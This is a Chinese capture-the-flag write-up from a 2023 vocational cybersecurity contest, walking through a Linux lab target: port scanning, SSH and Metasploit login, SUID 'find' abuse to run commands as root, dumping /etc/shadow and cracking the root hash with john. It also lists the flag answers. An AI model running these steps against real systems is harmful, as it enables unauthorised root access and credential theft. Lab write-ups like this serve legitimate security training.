2023年中职“网络安全“—Linux系统深入提权②

简介: 2023年中职“网络安全“—Linux系统深入提权②

Linux操作系统深入测试

任务环境说明:

  • 服务器场景:Server2203(关闭链接)
  • 用户名:hacker 密码:123456

1. 使用深入机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

nmap -p- -sV 靶机IP        # -p- 全端口,-sV 版本探测

d717dae453abebd3bea099e9fc8d7693.png

flag: 2232/tcp

2. 使用深入机对服务器信息收集,并将服务器中主机名称作为flag提交;

ssh hacker@靶机IP -p 2232            # -p 指定端口,这里有点小坑,应该kali的ssh版本高,靶机的ssh版本低,导致的。

1101fac4c2ddae91819a6aa0eb02f798.png

# 解法 1
ssh hacker@靶机IP -p 2232 -oKexAlgorithms=+diffie-hellman-group1-sha1        # -oKexAlgorithms=+diffie-hellman-group1-sha1 加上这个算,你可以点击下面的链接

legacy.html

# 解法 2 
msfconsole                    # 我只说你可能不懂得
search ssh_login
use 0
set RHOSTS 靶机IP
set username hacker
set password 123456
set RPORT 2232                # 注意一定要改端口,别忘记了
run
sessions -l                   # 列出会话
sessions 1                    # 连接第一个会话

134065d12619a0e6ac30d49c10edad08.png

uname -a        # 查看系统基本信息

flag: 1doLfH31

3. 使用深入机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

uname -a        # 查看系统基本信息

flag: 2.6.18-8.el5

4. 使用深入机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

find / -perm -u=s -type f 2>/dev/null

595f42a01cedaae531b95a89677c3e19.png

touch 1                            # 创建个文件
ls                                 # ls 查看文件
/usr/bin/find 1 -exec id \;        # 提权 -exec 执行命令 \; 结束

cbb8b3daa75dc6a7b3b3c982fe8854e2.png

/usr/bin/find 1 -exec ls /root \;
/usr/bin/find 1 -exec cat /root/key.txt \;

4a3172626684fd9b3fd53e5b910cd58a.png

flag: 84pPxbiP

5. 使用深入机对服务器管理员提权,并将服务器中root的密码作为flag提交;

/usr/bin/find 1 -exec cat /etc/shadow \;


f850164884be2a111839359a13e0c0b1.png

vim hash            # 把root信息行写入进去
cat hash            # 查看是否写入成功
john hash           # 破解密码

31d15b720c95783ea62dddc943f1a640.png

flag: darkman

  1. 使用深入机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。
su root                            # 切换root用户
id                                 # 查看id是否为root
cd                                 # 不加参数会直接回到当前用户的家目录
pwd                                # 查看当前所在目录路径
python -V                          # 查看当前python版本
python -m SimpleHTTPServer 8080    # 开启HTTP服务,端口8080

069b14225ebb51a0f8ba04be4273b9fe.png

访问的时候一定要指定8080端口


69759daa5cf282a8e5b3241f120370b1.png

flag: HVcKG7tf


目录
相关文章
|
3月前
|
Ubuntu Linux Anolis
Linux系统禁用swap
本文介绍了在新版本Linux系统(如Ubuntu 20.04+、CentOS Stream、openEuler等)中禁用swap的两种方法。传统通过注释/etc/fstab中swap行的方式已失效,现需使用systemd管理swap.target服务或在/etc/fstab中添加noauto参数实现禁用。方法1通过屏蔽swap.target适用于新版系统,方法2通过修改fstab挂载选项更通用,兼容所有系统。
301 3
Linux系统禁用swap
|
3月前
|
Linux
Linux系统修改网卡名为eth0、eth1
在Linux系统中,可通过修改GRUB配置和创建Udev规则或使用systemd链接文件,将网卡名改为`eth0`、`eth1`等传统命名方式,适用于多种发行版并支持多网卡配置。
473 3
|
4月前
|
Ubuntu Linux
计算机基础知识:linux系统怎么安装?
在虚拟机软件中创建一个新的虚拟机,并选择相应操作系统类型和硬盘空间大小等参数。将下载的 ISO 镜像文件加载到虚拟机中。启动虚拟机,进入安装界面,并按照步骤进行安装。安装完成后,可以在虚拟机中使用 Linux 系统。
|
4月前
|
存储 Ubuntu Linux
「正点原子Linux连载」第二章Ubuntu系统入门
在图2.8.2.4中,我们使用命令umount卸载了U盘,卸载以后当我们再去访问文件夹/mnt/tmp的时候发现里面没有任何文件了,说明我们卸载成功了。
|
Ubuntu Linux 网络安全
Linux系统初始化脚本
一款支持Rocky、CentOS、Ubuntu、Debian、openEuler等主流Linux发行版的系统初始化Shell脚本,涵盖网络配置、主机名设置、镜像源更换、安全加固等多项功能,适配单/双网卡环境,支持UEFI引导,提供多版本下载与持续更新。
416 0
Linux系统初始化脚本
|
4月前
|
运维 Linux 开发者
Linux系统中使用Python的ping3库进行网络连通性测试
以上步骤展示了如何利用 Python 的 `ping3` 库来检测网络连通性,并且提供了基本错误处理方法以确保程序能够优雅地处理各种意外情形。通过简洁明快、易读易懂、实操性强等特点使得该方法非常适合开发者或系统管理员快速集成至自动化工具链之内进行日常运维任务之需求满足。
295 18
|
3月前
|
安全 Linux Shell
Linux系统提权方式全面总结:从基础到高级攻防技术
本文全面总结Linux系统提权技术,涵盖权限体系、配置错误、漏洞利用、密码攻击等方法,帮助安全研究人员掌握攻防技术,提升系统防护能力。
344 1
|
3月前
|
监控 安全 Linux
Linux系统提权之计划任务(Cron Jobs)提权
在Linux系统中,计划任务(Cron Jobs)常用于定时执行脚本或命令。若配置不当,攻击者可利用其提权至root权限。常见漏洞包括可写的Cron脚本、目录、通配符注入及PATH变量劫持。攻击者通过修改脚本、创建恶意任务或注入命令实现提权。系统管理员应遵循最小权限原则、使用绝对路径、避免通配符、设置安全PATH并定期审计,以防范此类攻击。
1065 1
|
4月前
|
缓存 监控 Linux
Linux系统清理缓存(buff/cache)的有效方法。
总结而言,在大多数情形下你不必担心Linux中buffer与cache占用过多内存在影响到其他程序运行;因为当程序请求更多内存在没有足够可用资源时,Linux会自行调整其占有量。只有当你明确知道当前环境与需求并希望立即回收这部分资源给即将运行重负载任务之前才考虑上述方法去主动干预。
1660 10
|
4月前
|
安全 Linux 数据安全/隐私保护
为Linux系统的普通账户授予sudo访问权限的过程
完成上述步骤后,你提升的用户就能够使用 `sudo`命令来执行管理员级别的操作,而无需切换到root用户。这是一种更加安全和便捷的权限管理方式,因为它能够留下完整的权限使用记录,并以最小权限的方式工作。需要注意的是,随意授予sudo权限可能会使系统暴露在风险之中,尤其是在用户不了解其所执行命令可能带来的后果的情况下。所以在配置sudo权限时,必须谨慎行事。
678 0